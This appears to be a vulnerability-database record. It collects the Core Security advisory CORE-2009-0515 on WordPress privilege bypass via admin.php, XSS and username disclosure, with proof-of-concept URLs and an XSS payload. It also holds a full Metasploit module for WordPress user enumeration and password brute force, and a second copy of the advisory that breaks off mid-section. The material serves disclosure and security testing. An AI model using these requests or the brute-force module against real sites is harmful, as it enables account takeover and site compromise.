*Advisory Information* \n \nTitle: WordPress Privileges Unchecked in admin.php and Multiple \nInformation Disclosures \nAdvisory ID: CORE-2009-0515 \nAdvisory URL: \nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked \nDate published: 2009-07-08 \nDate of last update: 2009-07-08 \nVendors contacted: WordPress \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Local file include, Privileges unchecked, Cross site scripting \n(XSS), Information disclosure \nRemotely Exploitable: Yes \nLocally Exploitable: No \nBugtraq ID: 35581, 35584 \nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336 \n \n \n3. *Vulnerability Description* \n \nWordPress is a web application written in PHP that allows the easy \ninstallation of a flexible weblog on any computer connected to the \nInternet. WordPress 2.7 reached more than 6 million downloads during \nJune 2009 [9]. \n \nA vulnerability was found in the way that WordPress handles some URL \nrequests. This results in unprivileged users viewing the content of \nplugins configuration pages, and also in some plugins modifying plugin \noptions and injecting JavaScript code. Arbitrary native code may be run \nby a malicious attacker if the blog administrator runs injected \nJavasScript code that edits blog PHP code. Many WordPress-powered blogs, \nhosted outside 'wordpress.com', allow any person to create unprivileged \nusers called subscribers. Other sensitive username information \ndisclosures were found in WordPress. \n \n \n4. *Vulnerable packages* \n \n. WordPress 2.8 and previous \n. WordPress MU 2.7.1 and previous, used in WordPress.com \n \n \n5. *Non-vulnerable packages* \n \n. WordPress 2.8.1 \n. WordPress MU 2.8.1, used in WordPress.com \n \n \n6. 
*Vendor Information, Solutions and Workarounds* \n \nMitigation for the Privileges Unchecked vulnerability (suggested by Core \nSecurity): this vulnerability may be mitigated by controlling access to \nfiles inside the 'wp-admin' folder. Access can be prohibited by using \nApache access control mechanism ('.htaccess' file), see guideline for \nmore information [11]. \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered and researched by Fernando \nArnaboldi and Jos\u00e9 Orlicki from Core Security Technologies. Further \nresearch was made by Jose Orlicki from Core Security Technologies. \n \n \n8. *Technical Description / Proof of Concept Code* \n \n \n8.1. *Introduction* \n \nIn the last few years several security bugs were found in WordPress \n[1][2]. During 2008, the big amount of bugs reported by researchers lead \nto exploitation by blog spammers [3]. During 2009, a new round of \nattacks has appeared and security researchers are reporting new bugs or \nwrongly fixed previously-reported bugs [4][5]. A path traversal in local \nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we \nreport that administrative privileges are still unchecked when accessing \nany PHP file inside a plugin folder. \n \n \n8.2. *Access Control Roles* \n \nWordPress has a privilege model where any user has an assigned role [8]. \nRegarding plugins only users characterized by the role Administrator can \nactivate plugins. Notice that only the blog hosting owner can add new \nplugins because these must by copied inside the host filesystem. The \nroles Editor, Author or Subscriber (the latter has the least privileges) \ncannot activate plugins, edit plugins, update plugins nor delete plugins \ninstalled by an Administrator. Besides that, the configuration of \nspecific plugins is a grey area because there is no distinguished \ncapability assigned [8]. 
\n \nAlso due to cross-site scripting vulnerabilities inside plugins options \n(something very common), non-administrative users reconfiguring plugins \nmay inject persistent JavaScript code. Possibly arbitrary native code \ncan be executed by the attacker if the blog administrator runs injected \nJavasScript code that injects PHP code. It is important to observe that \nmany WordPress-powered blogs are configured to allow any blog visitor to \ncreate a Subscriber user without confirmation from the Administrator \nrole inside the following URL, although by default the Administrator \nrole must create these new users. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-login.php?action=register \n- -----------/ \n \nThis can be modified by the administrator in 'Membership/Anyone can \nregister'. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/options-general.php \n- -----------/ \n \n \n \n \n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes \n(CVE-2009-2334, BID 35581)* \n \nNo privileges are checked on WordPress plugins configuration PHP modules \nusing parameter 'page' when we replace 'options-general.php' with \n'admin.php'. The same thing happens when replacing other modules such as \n'plugins.php' with 'admin.php'. Basic information disclosure is done \nthis way. For example, with the following URL a user with no privileges \ncan see the configuration of plugin Collapsing Archives, if installed. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt \n- -----------/ \n \nInstead of the following allowed URL. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt \n- -----------/ \n \nAnother example of this information disclosure is shown on Akismet, a \nplugin shipped by default with WordPress. 
\n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt \n- -----------/ \n \nAll plugins we have tested are vulnerable to this kind of information \ndisclosure, but in many of them the PHP files accessed just crashed. On \nthe other hand, for example, with capability 'import', privileges are \nchecked inside 'admin.php': \n \n/----------- \n \nif ( ! current_user_can('import') ) \nwp_die(__('You are not allowed to import.')); \n- -----------/ \n \nMore dangerous scenarios exist, all of them can be exploited by users \nwith the Subscriber role, the least privileged. \n \n \n8.4. *Abuse example: XSS in plugin configuration module* \n \nIf installed, *Related Ways To Take Action* is an example of a WordPress \nplugin that is affected by many cross-site scripting vulnerabilities \n(XSS) that can be leveraged by an attacker using the unchecked \nprivileges described in this advisory to inject persistent JavaScript \ncode. Possibly, arbitrary native code can be executed by the attacker if \nthe blog administrator, when he/she logs in, runs injected JavasScript \ncode that edits blog PHP code. The original URL for reconfiguring the \nplugin can be accessed only by the Administrator role. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php \n- -----------/ \n \nBut replacing the PHP file with the generic 'admin.php' any blog user \ncan modify this configuration. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php \n- -----------/ \n \nThe following JavaScript injection can be entered within field *Exclude \nactions by term* to exemplify this kind of abuse. When the administrator \nenters the same page the injected browser code will be executed and \npossibly blog PHP can be modified to run arbitrary native code. 
\n \n/----------- \n \n\\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref=\" \n \n- -----------/ \n \nThis is the worst scenario that we found for the vulnerability. \n \n \n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard* \n \nIf installed, the WordPress Security Scanner Plugin dashboard can be \nviewed similarly by any user besides the administrator using the plugin \nconfiguration page URL without modification. This dashboard includes \ncommon default blog configuration settings that are insecure and should \nbe modified by the blog administrator or hosting. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php \n- -----------/ \n \n \n \n \n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project* \n \nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be \nreconfigured accessed with the same vulnerability. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php \n- -----------/ \n \nThis gives an attacker the possibility to disable many features of the \nplugin, for example reactivate the forgotten password feature and \nreactivate the XML-RPC blog interface. Also you can deny the weblog \nservice by configuring this plugin to be overly sensitive, blocking any \nrequest. However the plugin cannot be totally disabled because the \nessential IDS parameters 'Maximum impact to ignore bad requests' and \n'Minimum impact to sanitize bad requests' are verified on the server \nside of the blog and cannot be distorted to deactivate the sanitizing or \nblocking features of the web IDS plugin. \n \n \n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID \n35584)* \n \nWordPress discriminates bad password from bad user logins, this reduces \nthe complexity of a brute force attack on WordPress blogs login \n(CVE-2009-2335, BID 35584). 
The same user information disclosure happens \nwhen users use the forgotten mail interface to request a new password \n(CVE-2009-2336, same BID 35584). These information disclosures seem to \nbe previously reported [6] but the WordPress team is refusing to modify \nthem alleging *user convenience*. \n \nDefault installation of WordPress 2.7.1 leaks the name of the user \nposting entries inside the HTML of the blog. \n \n/----------- \n \n<small>June 3rd, 2009 <!-- by leakedusername --></small> \n- -----------/ \n \n \n \nAlso several administrative modules give to anyone the complete path \nwhere the web application is hosted inside the server. This may simplify \nor enable other malicious attacks. An example follows. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-settings.php \n- -----------/ \n \n \n \n/----------- \n \nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in \n[WP_LEAKED_PATH]\\wp-settings.php on line 110 \nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in \n[WP_LEAKED_PATH]\\wp-settings.php on line 112 \nWarning: require(ABSPATHwp-includes/compat.php) [function.require]: \nfailed to open stream: \nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246 \nFatal error: require() [function.require]: Failed opening required \n'ABSPATHwp-includes/compat.php' \n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in \n[WP_LEAKED_PATH]\\wp-settings.php on line 246 \n \n- -----------/ \n \n \n \n \n9. *Report Timeline* \n \n. 2009-06-04: \nCore Security Technologies notifies the WordPress team of the \nvulnerabilities (security@wordpress.org) and offers a technical \ndescription encrypted or in plain-text. Advisory is planned for \npublication on June 22th. \n \n. 2009-06-08: \nCore notifies again the WordPress team of the vulnerability. \n \n. 2009-06-10: \nThe WordPress team asks Core for a technical description of the \nvulnerability in plain-text. \n \n. 
2009-06-11: \nTechnical details sent to WordPress team by Core. \n \n. 2009-06-11: \nWordPress team notifies Core that a fix was produced and is available to \nCore for testing. WordPress team asserts that password and username \ndiscrimination as well as username leakage are known and will not be \nfixed because they are convenient for the users. \n \n. 2009-06-12: \nCore tells the WordPress team that the patch will be tested by Core as a \ncourtesy as soon as possible. It also requests confirmation that \nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to \nthe flaws included in the advisory draft CORE-2009-0515. \n \n. 2009-06-12: \nWordPress team confirms that WordPress 2.8 and earlier plus \nWordPress.com are vulnerable to the flaws included in the advisory draft. \n \n. 2009-06-17: \nCore informs the WordPress team that the patch is only fixing one of the \nfour proof of concept abuses included in the advisory draft. Core \nreminds the WordPress team that the advisory is scheduled to be \npublished on June 22th but a new schedule can be discussed. \n \n. 2009-06-19: \nCore asks for a new patched version of WordPress, if available, and \nnotifies the WordPress team that the publication of the advisory was \nre-scheduled to June 30th. \n \n. 2009-06-19: \nWordPress team confirms they have a new patch that has the potential to \nbreak a lot of plugins. \n \n. 2009-06-29: \nWordPress team asks for a delayance on advisory CORE-2009-0515 \npublication until July 6th, when WordPress MU version will be patched. \n \n. 2009-06-29: \nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th. \n \n. 2009-06-29: \nCore tells the WordPress team that other administrative PHP modules can \nalso be rendered by non-administrative users, such as module \n'admin-post.php' and 'link-parse-opml.php'. \n \n. 
2009-07-02: \nWordPress team comments that 'admin.php' and 'admin-post.php' are \nintentionally open and plugins can choose to hook either privileged or \nunprivileged actions. They also comment that unprivileged access to \n'link-parse-opml.php' is benign but having this file open is bad form. \n \n. 2009-07-02: \nCore sends the WordPress team a new draft of the advisory and comments \nthat there is no capability specified in Worpress documentation for \nconfiguring plugins. Also control of actions registered by plugins is \nnot enforced. Core also notices that the privileges unchecked bug in \n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development \nrelease. \n \n. 2009-07-06: \nCore requests WordPress confirmation of the release date of WordPress \n2.8.1 and WordPress MU 2.8. \n \n. 2009-07-07: \nWordPress team confirms that a release candidate of WordPress 2.8.1 is \nmade available to users and that the advisory may be published. \n \n. 2009-07-06: \nCore requests WordPress confirmation of the release date of WordPress MU \nand WordPress MU new version numbers. \n \n. 2009-07-07: \nWordPress team release WordPress 2.8.1 RC1 to its users. \n \n. 2009-07-08: \nWordPress team confirms that WordPress MU 2.8.1 will be made available \nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th. \n \n. 2009-07-08: \nThe advisory CORE-2009-0515 is published. \n \n \n \n10. 
*References* \n \n[1] WordPress vulnerabilities in CVE database \nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress \n[2] SecuriTeam List of WordPress Vulnerabilities \nhttp://www.securiteam.com/products/W/Wordpress.html \n[3] WordPress Vulnerability - YBO Interactive Blog \nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/ \n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1 \nhttp://wordpress.org/support/topic/280748 \n[5] Security breach - xkcd blog \nhttp://blag.xkcd.com/2009/06/18/security-breach/ \n[6] securityvulns.com WordPress vulnerabilities digest in English \nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded \n[7] CVE-2008-0196 \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196 \n[8] WordPress Roles and Capabilities \nhttp://codex.wordpress.org/Roles_and_Capabilities \n[9] WordPress Download Counter \nhttp://wordpress.org/download/counter/ \n[10] WordPress Intrusion Detection System Plugin \nhttp://php-ids.org/2008/02/21/wpids-version-012-released/ \n[11] Hardening WordPress with htaccess \nhttp://blogsecurity.net/wordpress/article-210607 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://www.coresecurity.com/corelabs. \n \n \n12. 
*About Core Security Technologies* \n \nCore Security Technologies develops strategic solutions that help \nsecurity-conscious organizations worldwide develop and maintain a \nproactive process for securing their networks. The company's flagship \nproduct, CORE IMPACT, is the most comprehensive product for performing \nenterprise security assurance testing. CORE IMPACT evaluates network, \nendpoint and end-user vulnerabilities and identifies what resources are \nexposed. It enables organizations to determine if current security \ninvestments are detecting and preventing attacks. Core Security \nTechnologies augments its leading technology solution with world-class \nsecurity consulting services, including penetration testing and software \nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core \nSecurity Technologies can be reached at 617-399-6980 or on the Web at \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2009 Core Security \nTechnologies and (c) 2009 CoreLabs, and may be distributed freely \nprovided that no fee is charged for this distribution and proper credit \nis given. \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. 
\n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.6 (MingW32) \nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org \n \niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N \nTPRpR0Gn0WqmF8HOeDslbA8= \n=zEDK \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/79033/CORE-2009-0515.txt"}], "metasploit": [{"lastseen": "2019-11-28T12:02:12", "description": "WordPress Authentication Brute Force and User Enumeration Utility\n", "published": "2013-08-21T10:45:15", "type": "metasploit", "title": "WordPress Brute Force and User Enumeration Utility", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2335"], "modified": "2018-06-14T18:28:03", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_LOGIN_ENUM", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n\n def initialize\n super(\n 'Name' => 'WordPress Brute Force and User Enumeration Utility',\n 'Description' => 'WordPress Authentication Brute Force and User Enumeration Utility',\n 'Author' =>\n [\n 'Tiago Ferreira <tiago.ccna[at]gmail.com>',\n 'Zach Grace <zgrace[at]404labs.com>',\n 'Christian Mehlmauer'\n ],\n 'References' =>\n [\n ['BID', '35581'],\n ['CVE', '2009-2335'],\n ['OSVDB', '55713']\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptBool.new('VALIDATE_USERS', [ true, 'Validate usernames', true ]),\n OptBool.new('BRUTEFORCE', [ true, 'Perform brute force authentication', true ]),\n OptBool.new('ENUMERATE_USERNAMES', [ true, 'Enumerate usernames', true ]),\n OptInt.new('RANGE_START', [false, 
'First user id to enumerate', 1]),\n OptInt.new('RANGE_END', [false, 'Last user id to enumerate', 10])\n ])\n\n end\n\n def run_host(ip)\n\n unless wordpress_and_online?\n print_error(\"#{target_uri} does not seem to be WordPress site\")\n return\n end\n\n version = wordpress_version\n print_status(\"#{target_uri} - WordPress Version #{version} detected\") if version\n\n usernames = []\n if datastore['ENUMERATE_USERNAMES']\n vprint_status(\"#{target_uri} - WordPress User-Enumeration - Running User Enumeration\")\n usernames = enum_usernames\n end\n\n if datastore['VALIDATE_USERS']\n @users_found = {}\n vprint_status(\"#{target_uri} - WordPress User-Validation - Running User Validation\")\n each_user_pass { |user, pass|\n validate_user(user)\n }\n\n unless @users_found.empty?\n print_good(\"#{target_uri} - WordPress User-Validation - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\")\n end\n end\n\n if datastore['BRUTEFORCE']\n vprint_status(\"#{target_uri} - WordPress Brute Force - Running Bruteforce\")\n if datastore['VALIDATE_USERS']\n if @users_found && @users_found.keys.size > 0\n vprint_status(\"#{target_uri} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? 
\"user\" : \"users\"}\")\n end\n end\n\n # Brute-force using files.\n each_user_pass { |user, pass|\n if datastore['VALIDATE_USERS']\n next unless @users_found[user]\n end\n\n do_login(user, pass)\n }\n\n # Brute force previously found users\n if not usernames.empty?\n print_status(\"#{target_uri} - Brute-forcing previously found accounts...\")\n passwords = load_password_vars\n usernames.each do |user|\n passwords.each do |pass|\n do_login(user, pass)\n end\n end\n end\n\n end\n end\n\n def validate_user(user=nil)\n print_status(\"#{target_uri} - WordPress User-Validation - Checking Username:'#{user}'\")\n\n exists = wordpress_user_exists?(user)\n if exists\n print_good(\"#{target_uri} - WordPress User-Validation - Username: '#{user}' - is VALID\")\n connection_details = {\n module_fullname: self.fullname,\n username: user,\n workspace_id: myworkspace_id,\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n\n framework.db.create_credential_and_login(connection_details)\n @users_found[user] = :reported\n return :next_user\n else\n vprint_error(\"#{target_uri} - WordPress User-Validation - Invalid Username: '#{user}'\")\n return :skip_user\n end\n end\n\n\n def do_login(user=nil, pass=nil)\n vprint_status(\"#{target_uri} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'\")\n\n cookie = wordpress_login(user, pass)\n\n if cookie\n print_good(\"#{target_uri} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'\")\n\n store_valid_credential(user: user, private: pass, proof: cookie)\n\n return :next_user\n else\n vprint_error(\"#{target_uri} - WordPress Brute Force - Failed to login as '#{user}'\")\n return\n end\n end\n\n def enum_usernames\n usernames = []\n for i in datastore['RANGE_START']..datastore['RANGE_END']\n username = wordpress_userid_exists?(i)\n if username\n print_good \"#{target_uri} - Found user '#{username}' with id #{i.to_s}\"\n usernames << username\n end\n end\n\n if not 
usernames.empty?\n p = store_loot('wordpress.users', 'text/plain', rhost, usernames * \"\\n\", \"#{rhost}_wordpress_users.txt\")\n print_good(\"#{target_uri} - Usernames stored in: #{p}\")\n end\n\n return usernames\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_login_enum.rb"}], "seebug": [{"lastseen": "2017-11-19T18:43:57", "description": "BUGTRAQ ID: 35581\r\nCVE(CAN) ID: CVE-2009-2335,CVE-2009-2336\r\n\r\nWordPress\u662f\u4e00\u6b3e\u514d\u8d39\u7684\u8bba\u575bBlog\u7cfb\u7edf\u3002\r\n\r\nWordPress\u5bf9\u4e8e\u4f7f\u7528\u5df2\u6709\u7684\u7528\u6237\u540d\u548c\u4e0d\u5b58\u5728\u7528\u6237\u540d\u7684\u767b\u5f55\u5c1d\u8bd5\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u7ed3\u679c\uff0c\u8fd9\u964d\u4f4e\u4e86\u66b4\u529b\u731c\u6d4b\u653b\u51fb\u7684\u590d\u6742\u6027\uff1b\u6b64\u5916\u5728\u4f7f\u7528\u53e3\u4ee4\u91cd\u7f6e\u754c\u9762\u8bf7\u6c42\u65b0\u53e3\u4ee4\u7684\u65f6\u5019\uff0c\u5bf9\u4e8e\u5df2\u6709\u7684\u548c\u4e0d\u5b58\u5728\u7684\u7528\u6237\u540d\u4e5f\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u7ed3\u679c\u3002\n\nWordPress WordPress 2.6.5\r\nWordPress WordPress MU 2.7.1\n\r\nWordPress\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://wordpress.org/", "published": "2009-07-10T00:00:00", "type": "seebug", "title": "WordPress\u53e3\u4ee4\u91cd\u7f6e\u7528\u6237\u540d\u679a\u4e3e\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11787", "id": "SSV:11787", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T18:44:22", "description": "No description provided by source.", "published": "2009-07-10T00:00:00", "type": "seebug", "title": "WordPress Privileges Unchecked in admin.php and Multiple Information", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14855", "id": "SSV:14855", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nWordPress Privileges Unchecked in admin.php and Multiple Information\r\nDisclosures\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\r\nInformation Disclosures\r\nAdvisory ID: CORE-2009-0515\r\nAdvisory URL:\r\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked\r\nDate published: 2009-07-08\r\nDate of last update: 2009-07-08\r\nVendors contacted: WordPress\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Local file include, Privileges unchecked, Cross site scripting\r\n(XSS), Information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35581, 35584\r\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nWordPress is a web application written in PHP that allows the easy\r\ninstallation of a flexible weblog on any computer connected to the\r\nInternet. WordPress 2.7 reached more than 6 million downloads during\r\nJune 2009 [9].\r\n\r\nA vulnerability was found in the way that WordPress handles some URL\r\nrequests. 
This results in unprivileged users viewing the content of\r\nplugins configuration pages, and also in some plugins modifying plugin\r\noptions and injecting JavaScript code. Arbitrary native code may be run\r\nby a malicious attacker if the blog administrator runs injected\r\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\r\nhosted outside 'wordpress.com', allow any person to create unprivileged\r\nusers called subscribers. Other sensitive username information\r\ndisclosures were found in WordPress.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . WordPress 2.8 and previous\r\n . WordPress MU 2.7.1 and previous, used in WordPress.com\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . WordPress 2.8.1\r\n . WordPress MU 2.8.1, used in WordPress.com\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\r\nSecurity): this vulnerability may be mitigated by controlling access to\r\nfiles inside the 'wp-admin' folder. Access can be prohibited by using\r\nApache access control mechanism ('.htaccess' file), see guideline for\r\nmore information [11].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Fernando\r\nArnaboldi and Jos\u00e9 Orlicki from Core Security Technologies. Further\r\nresearch was made by Jose Orlicki from Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nIn the last few years several security bugs were found in WordPress\r\n[1][2]. During 2008, the big amount of bugs reported by researchers lead\r\nto exploitation by blog spammers [3]. During 2009, a new round of\r\nattacks has appeared and security researchers are reporting new bugs or\r\nwrongly fixed previously-reported bugs [4][5]. 
A path traversal in local\r\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\r\nreport that administrative privileges are still unchecked when accessing\r\nany PHP file inside a plugin folder.\r\n\r\n\r\n8.2. *Access Control Roles*\r\n\r\nWordPress has a privilege model where any user has an assigned role [8].\r\nRegarding plugins only users characterized by the role Administrator can\r\nactivate plugins. Notice that only the blog hosting owner can add new\r\nplugins because these must by copied inside the host filesystem. The\r\nroles Editor, Author or Subscriber (the latter has the least privileges)\r\ncannot activate plugins, edit plugins, update plugins nor delete plugins\r\ninstalled by an Administrator. Besides that, the configuration of\r\nspecific plugins is a grey area because there is no distinguished\r\ncapability assigned [8].\r\n\r\nAlso due to cross-site scripting vulnerabilities inside plugins options\r\n(something very common), non-administrative users reconfiguring plugins\r\nmay inject persistent JavaScript code. Possibly arbitrary native code\r\ncan be executed by the attacker if the blog administrator runs injected\r\nJavasScript code that injects PHP code. It is important to observe that\r\nmany WordPress-powered blogs are configured to allow any blog visitor to\r\ncreate a Subscriber user without confirmation from the Administrator\r\nrole inside the following URL, although by default the Administrator\r\nrole must create these new users.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-login.php?action=register\r\n- -----------/\r\n\r\n This can be modified by the administrator in 'Membership/Anyone can\r\nregister'.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. 
*Privileges Unchecked in admin.php?page= Plugin Local File Includes\r\n(CVE-2009-2334, BID 35581)*\r\n\r\nNo privileges are checked on WordPress plugins configuration PHP modules\r\nusing parameter 'page' when we replace 'options-general.php' with\r\n'admin.php'. The same thing happens when replacing other modules such as\r\n'plugins.php' with 'admin.php'. Basic information disclosure is done\r\nthis way. For example, with the following URL a user with no privileges\r\ncan see the configuration of plugin Collapsing Archives, if installed.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Instead of the following allowed URL.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Another example of this information disclosure is shown on Akismet, a\r\nplugin shipped by default with WordPress.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\r\n- -----------/\r\n\r\n All plugins we have tested are vulnerable to this kind of information\r\ndisclosure, but in many of them the PHP files accessed just crashed. On\r\nthe other hand, for example, with capability 'import', privileges are\r\nchecked inside 'admin.php':\r\n\r\n/-----------\r\n\r\nif ( ! current_user_can('import') )\r\n wp_die(__('You are not allowed to import.'));\r\n- -----------/\r\n\r\n More dangerous scenarios exist, all of them can be exploited by users\r\nwith the Subscriber role, the least privileged.\r\n\r\n\r\n8.4. *Abuse example: XSS in plugin configuration module*\r\n\r\nIf installed, *Related Ways To Take Action* is an example of a WordPress\r\nplugin that is affected by many cross-site scripting vulnerabilities\r\n(XSS) that can be leveraged by an attacker using the unchecked\r\nprivileges described in this advisory to inject persistent JavaScript\r\ncode. 
Possibly, arbitrary native code can be executed by the attacker if\r\nthe blog administrator, when he/she logs in, runs injected JavasScript\r\ncode that edits blog PHP code. The original URL for reconfiguring the\r\nplugin can be accessed only by the Administrator role.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n But replacing the PHP file with the generic 'admin.php' any blog user\r\ncan modify this configuration.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n The following JavaScript injection can be entered within field *Exclude\r\nactions by term* to exemplify this kind of abuse. When the administrator\r\nenters the same page the injected browser code will be executed and\r\npossibly blog PHP can be modified to run arbitrary native code.\r\n\r\n/-----------\r\n\r\n\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref="\r\n\r\n- -----------/\r\n\r\n This is the worst scenario that we found for the vulnerability.\r\n\r\n\r\n8.5. *Abuse example: viewing WP Security Scanner Plugin 